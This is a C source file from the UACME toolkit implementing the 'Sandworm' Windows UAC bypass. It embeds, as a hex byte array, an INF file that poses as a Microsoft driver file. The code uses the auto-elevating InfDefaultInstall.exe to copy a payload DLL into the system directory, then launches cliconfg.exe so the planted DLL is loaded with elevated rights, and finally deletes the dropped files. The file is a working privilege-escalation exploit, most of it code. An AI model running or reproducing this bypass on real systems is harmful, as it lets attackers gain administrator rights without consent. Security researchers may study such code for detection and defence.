UACME/Source/Akagi/methods/sandworm.c

/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2017
*
*  TITLE:       SANDWORM.C
*
*  VERSION:     2.70
*
*  DATE:        25 Mar 2017
*
*  Sandworm method.
*
*  Used as part of exploit which is linked with rumored "russian hackers".
*  - <EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD>-<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>?
*  - Yes I can!
*
*  Originally it was on list to include in first UACMe releases but was considered 
*  way too out-date and unavailable under something else than Windows 7 + Windows 8.
*  However since Vault7 release this method again poped up in mind, thanks to CIA.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"

/*
g_SandwormInf

; 61883.INF
; Copyright (c) Microsoft Corporation.  All rights reserved.

[Version]
Signature="$CHICAGO$"
Class=61883
ClassGuid={7EBEFBC0-3200-11D2-B4C2-00A0C9697D07}
Provider=%Msft%
DriverVer=16/21/2006,6.1.7600.16385

[DestinationDirs]
DefaultDestDir = 11

[DefaultInstall]
CopyFiles=@ntwdblib.dll
*/

static const unsigned char g_SandwormInf[319] = {
    0x3B, 0x20, 0x36, 0x31, 0x38, 0x38, 0x33, 0x2E, 0x49, 0x4E, 0x46, 0x0D, 0x0A, 0x3B, 0x20, 0x43,
    0x6F, 0x70, 0x79, 0x72, 0x69, 0x67, 0x68, 0x74, 0x20, 0x28, 0x63, 0x29, 0x20, 0x4D, 0x69, 0x63,
    0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x20, 0x43, 0x6F, 0x72, 0x70, 0x6F, 0x72, 0x61, 0x74, 0x69,
    0x6F, 0x6E, 0x2E, 0x20, 0x20, 0x41, 0x6C, 0x6C, 0x20, 0x72, 0x69, 0x67, 0x68, 0x74, 0x73, 0x20,
    0x72, 0x65, 0x73, 0x65, 0x72, 0x76, 0x65, 0x64, 0x2E, 0x0D, 0x0A, 0x0D, 0x0A, 0x5B, 0x56, 0x65,
    0x72, 0x73, 0x69, 0x6F, 0x6E, 0x5D, 0x0D, 0x0A, 0x53, 0x69, 0x67, 0x6E, 0x61, 0x74, 0x75, 0x72,
    0x65, 0x3D, 0x22, 0x24, 0x43, 0x48, 0x49, 0x43, 0x41, 0x47, 0x4F, 0x24, 0x22, 0x0D, 0x0A, 0x43,
    0x6C, 0x61, 0x73, 0x73, 0x3D, 0x36, 0x31, 0x38, 0x38, 0x33, 0x0D, 0x0A, 0x43, 0x6C, 0x61, 0x73,
    0x73, 0x47, 0x75, 0x69, 0x64, 0x3D, 0x7B, 0x37, 0x45, 0x42, 0x45, 0x46, 0x42, 0x43, 0x30, 0x2D,
    0x33, 0x32, 0x30, 0x30, 0x2D, 0x31, 0x31, 0x44, 0x32, 0x2D, 0x42, 0x34, 0x43, 0x32, 0x2D, 0x30,
    0x30, 0x41, 0x30, 0x43, 0x39, 0x36, 0x39, 0x37, 0x44, 0x30, 0x37, 0x7D, 0x0D, 0x0A, 0x50, 0x72,
    0x6F, 0x76, 0x69, 0x64, 0x65, 0x72, 0x3D, 0x25, 0x4D, 0x73, 0x66, 0x74, 0x25, 0x0D, 0x0A, 0x44,
    0x72, 0x69, 0x76, 0x65, 0x72, 0x56, 0x65, 0x72, 0x3D, 0x31, 0x36, 0x2F, 0x32, 0x31, 0x2F, 0x32,
    0x30, 0x30, 0x36, 0x2C, 0x36, 0x2E, 0x31, 0x2E, 0x37, 0x36, 0x30, 0x30, 0x2E, 0x31, 0x36, 0x33,
    0x38, 0x35, 0x0D, 0x0A, 0x0D, 0x0A, 0x5B, 0x44, 0x65, 0x73, 0x74, 0x69, 0x6E, 0x61, 0x74, 0x69,
    0x6F, 0x6E, 0x44, 0x69, 0x72, 0x73, 0x5D, 0x0D, 0x0A, 0x44, 0x65, 0x66, 0x61, 0x75, 0x6C, 0x74,
    0x44, 0x65, 0x73, 0x74, 0x44, 0x69, 0x72, 0x20, 0x3D, 0x20, 0x31, 0x31, 0x0D, 0x0A, 0x0D, 0x0A,
    0x5B, 0x44, 0x65, 0x66, 0x61, 0x75, 0x6C, 0x74, 0x49, 0x6E, 0x73, 0x74, 0x61, 0x6C, 0x6C, 0x5D,
    0x0D, 0x0A, 0x43, 0x6F, 0x70, 0x79, 0x46, 0x69, 0x6C, 0x65, 0x73, 0x3D, 0x40, 0x6E, 0x74, 0x77,
    0x64, 0x62, 0x6C, 0x69, 0x62, 0x2E, 0x64, 0x6C, 0x6C, 0x0D, 0x0A, 0x0D, 0x0A, 0x0D, 0x0A
};


/*
* ucmSandwormMethod
*
* Purpose:
*
* Bypass UAC by using whitelisted InfDefaultInstall executable.
* Originally Sandworm used InfDefaultInstall to write to the HKLM.
* We will use it for dll hijack.
* Target application in our case will be cliconfg.exe
*
*/
BOOL ucmSandwormMethod(
    _In_ PVOID ProxyDll,
    _In_ DWORD ProxyDllSize
)
{
    BOOL bResult = FALSE;
    WCHAR szPayloadDll[MAX_PATH * 2];
    WCHAR szInstallInf[MAX_PATH * 2];
    WCHAR szProcessBuf[MAX_PATH * 2];

    RtlSecureZeroMemory(szPayloadDll, sizeof(szPayloadDll));
    RtlSecureZeroMemory(szInstallInf, sizeof(szInstallInf));

    //
    // Write proxy dll to the disk.
    //
    _strcpy(szPayloadDll, g_ctx.szTempDirectory);
    _strcat(szPayloadDll, NTWDBLIB_DLL);
    if (supWriteBufferToFile(szPayloadDll, ProxyDll, ProxyDllSize)) {

        //
        // Write installation inf to the disk.
        //
        _strcpy(szInstallInf, g_ctx.szTempDirectory);
        _strcat(szInstallInf, PACKAGE_INF);
        if (supWriteBufferToFile(szInstallInf, (PVOID)g_SandwormInf, sizeof(g_SandwormInf))) {

            //
            // Run infdefaultinstall.exe to copy our payload dll.
            //
            RtlSecureZeroMemory(&szProcessBuf, sizeof(szProcessBuf));
            _strcpy(szProcessBuf, g_ctx.szSystemDirectory);
            _strcat(szProcessBuf, INFDEFAULTINSTALL_EXE);
            if (supRunProcess(szProcessBuf, szInstallInf)) {

                //
                // Run target executable.
                //
                RtlSecureZeroMemory(&szProcessBuf, sizeof(szProcessBuf));
                _strcpy(szProcessBuf, g_ctx.szSystemDirectory);
                _strcat(szProcessBuf, CLICONFG_EXE);
                bResult = supRunProcess(szProcessBuf, NULL);
            }
        }
    }

    if (szInstallInf[0] != 0) {
        DeleteFile(szInstallInf);
    }
    if (szPayloadDll[0] != 0) {
        DeleteFile(szPayloadDll);
    }

    return bResult;
}